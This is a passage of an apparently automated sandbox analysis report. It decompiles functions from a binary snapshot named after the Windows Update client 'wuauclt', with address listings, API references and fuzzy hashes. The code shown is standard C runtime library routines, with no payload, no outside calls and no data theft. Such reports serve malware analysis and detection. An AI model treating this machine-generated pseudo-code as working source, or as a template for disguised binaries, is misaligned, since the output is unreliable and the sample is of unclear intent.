				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr* _t113;
				void* _t116;
				void* _t117;
				void* _t124;

				_push(__ebx);
				_t78 = _a8;
				_push(__esi);
				_push(_t103);
				_v5 = 0;
				_t109 = _t78 + 0x10;
				_push(_t109);
				_v16 = 1;
				_v20 = _t109;
				_v12 =  *(_t78 + 8) ^  *0x271004;
				_t56 = E002593A0(_t78, _t103, _t109,  *(_t78 + 8) ^  *0x271004);
				_t104 = _a12;
				_push(_t104);
				E00257957(_t56);
				_t58 = _a4;
				_t117 = _t116 + 0xc;
				if(( *(_t58 + 4) & 0x00000066) != 0) {
					__eflags =  *((intOrPtr*)(_t78 + 0xc)) - 0xfffffffe;
					if( *((intOrPtr*)(_t78 + 0xc)) != 0xfffffffe) {
						E0025A247(_t78, 0xfffffffe, _t109, 0x271004);
						goto L18;
					}
					goto L19;
				} else {
					_v32 = _t58;
					_v28 = _t104;
					_t104 =  *((intOrPtr*)(_t78 + 0xc));
					 *((intOrPtr*)(_t78 - 4)) =  &_v32;
					if(_t104 == 0xfffffffe) {
						L19:
						return _v16;
					} else {
						do {
							_t83 = _v12;
							_t19 = _t104 + 2; // 0x3
							_t64 = _t104 + _t19 * 2;
							_t78 =  *((intOrPtr*)(_t83 + _t64 * 4));
							_t65 = _t83 + _t64 * 4;
							_t84 =  *((intOrPtr*)(_t65 + 4));
							_v24 = _t65;
							if( *((intOrPtr*)(_t65 + 4)) == 0) {
								_t85 = _v5;
								goto L12;
							} else {
								_t66 = E0025A1FE(_t84, _t109);
								_t85 = 1;
								_v5 = 1;
								_t124 = _t66;
								if(_t124 < 0) {
									_v16 = 0;
									L18:
									_push(_t109);
									E002593A0(_t78, _t104, _t109, _v12);
									goto L19;
								} else {
									if(_t124 <= 0) {
										goto L12;
									} else {
										_t67 = _a4;
										if( *_a4 == 0xe06d7363) {
											_t126 =  *0x269558;
											if( *0x269558 != 0) {
												_t67 = E002673A0(_t126, 0x269558);
												_t117 = _t117 + 4;
												if(_t67 != 0) {
													_t113 =  *0x269558; // 0x2584a4
													L00257B59();
													_t67 =  *_t113(_a4, 1);
													_t109 = _v20;
													_t117 = _t117 + 8;
												}
											}
										}
										E0025A22E(_t67, _a8, _a4);
										_t69 = _a8;
										if( *((intOrPtr*)(_t69 + 0xc)) != _t104) {
											E0025A247(_t69, _t104, _t109, 0x271004);
											_t69 = _a8;
										}
										_push(_t109);
										 *((intOrPtr*)(_t69 + 0xc)) = _t78;
										E002593A0(_t78, _t104, _t109, _v12);
										E0025A215();
										asm("int3");
										_push(_t104);
										_t106 = _v40;
										if( *((char*)(_t106 + 4)) == 0) {
											L29:
											_t89 = _a4;
											_t71 =  *_t106;
											 *_t89 = _t71;
											 *((char*)(_t89 + 4)) = 0;
										} else {
											_t90 =  *_t106;
											if(_t90 == 0) {
												goto L29;
											} else {
												_t101 = _t90 + 1;
												do {
													_t72 =  *_t90;
													_t90 = _t90 + 1;
												} while (_t72 != 0);
												_push(_t78);
												_push(_t109);
												_t80 = _t90 - _t101 + 1;
												_push(_t90 - _t101 + 1);
												_t111 = E0025B87D(_t90 - _t101);
												if(_t111 != 0) {
													E0025BAB2(_t111, _t80,  *_t106);
													_t75 = _a4;
													_t94 = _t111;
													_t111 = 0;
													 *_t75 = _t94;
													 *((char*)(_t75 + 4)) = 1;
												}
												_t71 = E0025B878(_t111);
											}
										}
										return _t71;
									}
								}
							}
							goto L31;
							L12:
							_t104 = _t78;
							__eflags = _t78 - 0xfffffffe;
						} while (_t78 != 0xfffffffe);
						__eflags = _t85;
						if(_t85 != 0) {
							goto L18;
						}
						goto L19;
					}
				}
				L31:
			}





































                                                0x002593e6
                                                0x002593e7
                                                0x002593ea
                                                0x002593eb
                                                0x002593ec
                                                0x002593f3
                                                0x002593fc
                                                0x002593fe
                                                0x00259405
                                                0x00259408
                                                0x0025940b
                                                0x00259410
                                                0x00259413
                                                0x00259414
                                                0x00259419
                                                0x0025941c
                                                0x00259423
                                                0x002594dd
                                                0x002594e1
                                                0x002594f0
                                                0x00000000
                                                0x002594f0
                                                0x00000000
                                                0x00259429
                                                0x00259429
                                                0x0025942f
                                                0x00259432
                                                0x00259435
                                                0x0025943b
                                                0x00259501
                                                0x0025950a
                                                0x00259441
                                                0x00259441
                                                0x00259441
                                                0x00259444
                                                0x00259447
                                                0x0025944a
                                                0x0025944d
                                                0x00259450
                                                0x00259453
                                                0x00259458
                                                0x002594c0
                                                0x00000000
                                                0x0025945a
                                                0x0025945c
                                                0x00259461
                                                0x00259463
                                                0x00259466
                                                0x00259468
                                                0x002594d4
                                                0x002594f5
                                                0x002594f5
                                                0x002594f9
                                                0x00000000
                                                0x0025946a
                                                0x0025946a
                                                0x00000000
                                                0x0025946c
                                                0x0025946c
                                                0x00259475
                                                0x00259477
                                                0x0025947e
                                                0x00259485
                                                0x0025948a
                                                0x0025948f
                                                0x00259491
                                                0x0025949e
                                                0x002594a3
                                                0x002594a5
                                                0x002594a8
                                                0x002594a8
                                                0x0025948f
                                                0x0025947e
                                                0x002594b1
                                                0x002594b6
                                                0x002594bc
                                                0x00259515
                                                0x0025951a
                                                0x0025951a
                                                0x0025951d
                                                0x00259521
                                                0x00259524
                                                0x00259534
                                                0x00259539
                                                0x0025953d
                                                0x0025953e
                                                0x00259545
                                                0x0025958f
                                                0x0025958f
                                                0x00259592
                                                0x00259594
                                                0x00259596
                                                0x00259547
                                                0x00259547
                                                0x0025954b
                                                0x00000000
                                                0x0025954d
                                                0x0025954d
                                                0x00259550
                                                0x00259550
                                                0x00259552
                                                0x00259553
                                                0x00259559
                                                0x0025955a
                                                0x0025955b
                                                0x0025955e
                                                0x00259564
                                                0x00259569
                                                0x0025956f
                                                0x00259574
                                                0x00259577
                                                0x0025957c
                                                0x0025957e
                                                0x00259580
                                                0x00259580
                                                0x00259585
                                                0x0025958c
                                                0x0025954b
                                                0x0025959c
                                                0x0025959c
                                                0x0025946a
                                                0x00259468
                                                0x00000000
                                                0x002594c3
                                                0x002594c3
                                                0x002594c5
                                                0x002594c5
                                                0x002594ce
                                                0x002594d0
                                                0x00000000
                                                0x002594d2
                                                0x00000000
                                                0x002594d0
                                                0x0025943b
                                                0x00000000

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0025940B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00259485
                                                  • Part of subcall function 002673A0: __FindPESection.LIBCMT ref: 002673F9
                                                • _ValidateLocalCookies.LIBCMT ref: 002594F9
                                                • _ValidateLocalCookies.LIBCMT ref: 00259524
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: de701f6cb5727e47b70fdbd38f07151ce7ea653632e07fb9f85a27f0095698b9
                                                • Instruction ID: ae828f296b16507ba58cd885adf9bb14490240f2192a0f783d65505970e24e62
                                                • Opcode Fuzzy Hash: de701f6cb5727e47b70fdbd38f07151ce7ea653632e07fb9f85a27f0095698b9
                                                • Instruction Fuzzy Hash: 62411830920205DBCF10DF58C885AAEBBB5AF45325F148195EC189B392D732DDBACF95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025C993 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0025C944,00000003,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002), ref: 0025C9B3
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0025C9C6
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0025C944,00000003,?,0025C8E4,00000003,0026F9B8,0000000C,0025CA3B,00000003,00000002,00000000), ref: 0025C9E9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9463e8f6affd5ee35b234ccc12d195641e179eea3283db73ee7b0d15755805eb
                                                • Instruction ID: 08ea4c825d8450cd44aaba97cbe5e5b8df3052b73f46f3575c5f7280be6033f3
                                                • Opcode Fuzzy Hash: 9463e8f6affd5ee35b234ccc12d195641e179eea3283db73ee7b0d15755805eb
                                                • Instruction Fuzzy Hash: E1F03131610219FFCB115F94EC0DBADBFA8EB05716F114095E809A2190DF715D94CA94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025CDFC Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E0025CDFC(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x271004; // 0x80aab37c
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E0025C0CC( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E002575F9(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E002575F9(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E002575F9(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E00261204(_t56);
						_t40 = E0025D2F4(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E00261204(_t56);
						E0025D2F4(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x271004;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                                0x0025cdfc
                                                0x0025ce06
                                                0x0025ce0a
                                                0x0025ce0c
                                                0x0025ce10
                                                0x0025ce1a
                                                0x0025ce2b
                                                0x0025ce30
                                                0x0025ce32
                                                0x0025ce34
                                                0x0025ce36
                                                0x0025ce38
                                                0x0025ce3c
                                                0x0025cef6
                                                0x0025cf04
                                                0x0025cf06
                                                0x0025cf0b
                                                0x0025cf12
                                                0x0025cf14
                                                0x0025cf22
                                                0x0025cf31
                                                0x0025cf34
                                                0x0025cf36
                                                0x00000000
                                                0x0025cf37
                                                0x0025ce44
                                                0x0025ce49
                                                0x0025ce4e
                                                0x0025ce50
                                                0x0025ce50
                                                0x0025ce52
                                                0x0025ce57
                                                0x0025ce5b
                                                0x0025ce5b
                                                0x0025ce5e
                                                0x0025ce7d
                                                0x0025ce7d
                                                0x0025ce7f
                                                0x0025ce82
                                                0x0025ce8b
                                                0x0025ce8e
                                                0x0025ce93
                                                0x0025ce96
                                                0x0025ce9b
                                                0x00000000
                                                0x00000000
                                                0x0025ce9d
                                                0x00000000
                                                0x0025ce60
                                                0x0025ce60
                                                0x0025ce62
                                                0x0025ce6b
                                                0x0025ce6e
                                                0x0025ce73
                                                0x0025ce76
                                                0x0025ce7b
                                                0x0025cea5
                                                0x0025cea8
                                                0x0025ceaa
                                                0x0025cead
                                                0x0025ceb5
                                                0x0025cebb
                                                0x0025cec2
                                                0x0025cec4
                                                0x0025cecc
                                                0x0025cedb
                                                0x0025cedf
                                                0x0025cee1
                                                0x0025cee4
                                                0x00000000
                                                0x00000000
                                                0x0025cee6
                                                0x0025cee9
                                                0x0025ceeb
                                                0x0025ceeb
                                                0x0025ceec
                                                0x0025ceee
                                                0x0025cef1
                                                0x00000000
                                                0x0025ceeb
                                                0x00000000
                                                0x0025ce7b
                                                0x0025ce5e
                                                0x00000000

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 889ad5287632e9fccec060b70c5c8ec278a043ebf120d6266c71b932e6476f06
                                                • Instruction ID: 7be3e122e5074b80190d015c6982cfbc906800fc7f79f6ff5cdd809f8fdb2dc3
                                                • Opcode Fuzzy Hash: 889ad5287632e9fccec060b70c5c8ec278a043ebf120d6266c71b932e6476f06
                                                • Instruction Fuzzy Hash: F841D132A203009FCB20DF78C885A5EB7A5EF88715F254569ED15EB281E731ED15CB84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00260D36 Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 81%
                                                			E00260D36(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __esi;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t68;
				signed int _t69;
				short* _t70;

				_t34 =  *0x271004; // 0x80aab37c
				_v8 = _t34 ^ _t69;
				E0025A9BC(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00257097(_v8 ^ _t69, _t68);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t68 = 0;
					L11:
					if(_t68 != 0) {
						E002596C0(_t67, _t68, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t68, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t68, _t46, _a20);
						}
					}
					L14:
					E00260E53(_t68);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t68 = E0025D32E(_t63, _t48 & _t63);
					if(_t68 == 0) {
						goto L14;
					}
					 *_t68 = 0xdddd;
					L9:
					_t68 =  &(_t68[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E002676E0();
				_t68 = _t70;
				if(_t68 == 0) {
					goto L14;
				}
				 *_t68 = 0xcccc;
				goto L9;
			}





















                                                0x00260d3e
                                                0x00260d45
                                                0x00260d51
                                                0x00260d56
                                                0x00260d5b
                                                0x00260d60
                                                0x00260d63
                                                0x00260d65
                                                0x00260d65
                                                0x00260d6a
                                                0x00260d83
                                                0x00260d89
                                                0x00260d8e
                                                0x00260e2d
                                                0x00260e31
                                                0x00260e36
                                                0x00260e36
                                                0x00260e52
                                                0x00260e52
                                                0x00260d94
                                                0x00260d9c
                                                0x00260da0
                                                0x00260dec
                                                0x00260dee
                                                0x00260df0
                                                0x00260df5
                                                0x00260e0c
                                                0x00260e14
                                                0x00260e24
                                                0x00260e24
                                                0x00260e14
                                                0x00260e26
                                                0x00260e27
                                                0x00000000
                                                0x00260e2c
                                                0x00260da7
                                                0x00260da9
                                                0x00260dab
                                                0x00260db3
                                                0x00260dd0
                                                0x00260dda
                                                0x00260ddf
                                                0x00000000
                                                0x00000000
                                                0x00260de1
                                                0x00260de7
                                                0x00260de7
                                                0x00000000
                                                0x00260de7
                                                0x00260db7
                                                0x00260dbb
                                                0x00260dc0
                                                0x00260dc4
                                                0x00000000
                                                0x00000000
                                                0x00260dc6
                                                0x00000000

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0025E0BD,?,00000000,?,00000001,?,?,00000001,0025E0BD,?), ref: 00260D83
                                                • __alloca_probe_16.LIBCMT ref: 00260DBB
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00260E0C
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0025BC44,?), ref: 00260E1E
                                                • __freea.LIBCMT ref: 00260E27
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                • String ID:
                                                • API String ID: 1857427562-0
                                                • Opcode ID: 9d396335fa80049c547ac152a638c158950e78602ebc51931ce571e6cd5807b6
                                                • Instruction ID: 6cf31ae085a22fe58d2031b4262c538b82056dfc6c55110dd71fc5edd02f65fa
                                                • Opcode Fuzzy Hash: 9d396335fa80049c547ac152a638c158950e78602ebc51931ce571e6cd5807b6
                                                • Instruction Fuzzy Hash: C631D272A2021AABDF248F64DC85EAF7BA9EF04310F144668FC04D6150E736DDA4DB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00260459 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 93%
                                                			E00260459() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00260422(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E0025D32E(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E0025D2F4(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












                                                0x00260468
                                                0x0026046e
                                                0x002604c6
                                                0x002604c6
                                                0x00260470
                                                0x00260471
                                                0x00260476
                                                0x0026047f
                                                0x00260485
                                                0x0026048b
                                                0x00260490
                                                0x00000000
                                                0x00260492
                                                0x00260498
                                                0x0026049d
                                                0x002604bb
                                                0x002604b5
                                                0x002604b5
                                                0x002604b7
                                                0x002604b7
                                                0x002604be
                                                0x002604c3
                                                0x00260490
                                                0x002604ca
                                                0x002604cd
                                                0x002604cd
                                                0x002604db

                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 00260462
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00260485
                                                  • Part of subcall function 0025D32E: HeapAlloc.KERNEL32(00000000,?,00000000,?,00260DDA,00000000,?,0025BC44,?,00000008,?,0025E0BD,?,?,?), ref: 0025D360
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 002604AB
                                                • _free.LIBCMT ref: 002604BE
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002604CD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                • String ID:
                                                • API String ID: 2278895681-0
                                                • Opcode ID: 29e4403006f7ca21230a4b1da20818ef7db24d1e4b1842ee1c5bd42d1a7da164
                                                • Instruction ID: 9c86b96d05068e98dae90aa8776569bec96123e5e38a59aaa372f869a72a9d15
                                                • Opcode Fuzzy Hash: 29e4403006f7ca21230a4b1da20818ef7db24d1e4b1842ee1c5bd42d1a7da164
                                                • Instruction Fuzzy Hash: 2F01D872A213127B27311A766CCCD7B6A6DDBC3BA13148119FE08D3200EFB08C5195B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00260BAD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00260BAD(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x272b18; // 0x272b0c
					if(_t23 != 0) {
						E0025D2F4(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x272b1c; // 0x273f08
					if(_t24 != 0) {
						E0025D2F4(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x272b20; // 0x273f08
					if(_t25 != 0) {
						E0025D2F4(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x272b48; // 0x272b10
					if(_t26 != 0) {
						E0025D2F4(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x272b4c; // 0x273f0c
					if(_t27 != 0) {
						return E0025D2F4(_t6);
					}
				}
				return _t6;
			}










                                                0x00260bb3
                                                0x00260bb8
                                                0x00260bbc
                                                0x00260bc2
                                                0x00260bc5
                                                0x00260bca
                                                0x00260bce
                                                0x00260bd4
                                                0x00260bd7
                                                0x00260bdc
                                                0x00260be0
                                                0x00260be6
                                                0x00260be9
                                                0x00260bee
                                                0x00260bf2
                                                0x00260bf8
                                                0x00260bfb
                                                0x00260c00
                                                0x00260c01
                                                0x00260c04
                                                0x00260c0a
                                                0x00000000
                                                0x00260c12
                                                0x00260c0a
                                                0x00260c15

                                                APIs
                                                • _free.LIBCMT ref: 00260BC5
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 00260BD7
                                                • _free.LIBCMT ref: 00260BE9
                                                • _free.LIBCMT ref: 00260BFB
                                                • _free.LIBCMT ref: 00260C0D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 91f7a46e97801fff4720ea439808a449139ef31a2e257c27727a30c8ea79070e
                                                • Instruction ID: 103b609860cf0704160e830bcf51b74aeaa8a23c333ae343b943910d26ec3e19
                                                • Opcode Fuzzy Hash: 91f7a46e97801fff4720ea439808a449139ef31a2e257c27727a30c8ea79070e
                                                • Instruction Fuzzy Hash: F7F06D32524202ABC630EF5CF8C6D0BB3D9AA00718B684C05F808D7952CB70FCE59E64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0025C176 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 88%
                                                			E0025C176(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E0026007F(_t52);
					GetModuleFileNameA(0, 0x273958, 0x104);
					_t49 =  *0x273a88; // 0x14b3300
					 *0x273a90 = 0x273958;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x273958;
					}
					_v8 = 0;
					_v16 = 0;
					E0025C29A(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E0025C40F(_v8, _v16, 1);
					if(_t64 != 0) {
						E0025C29A(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
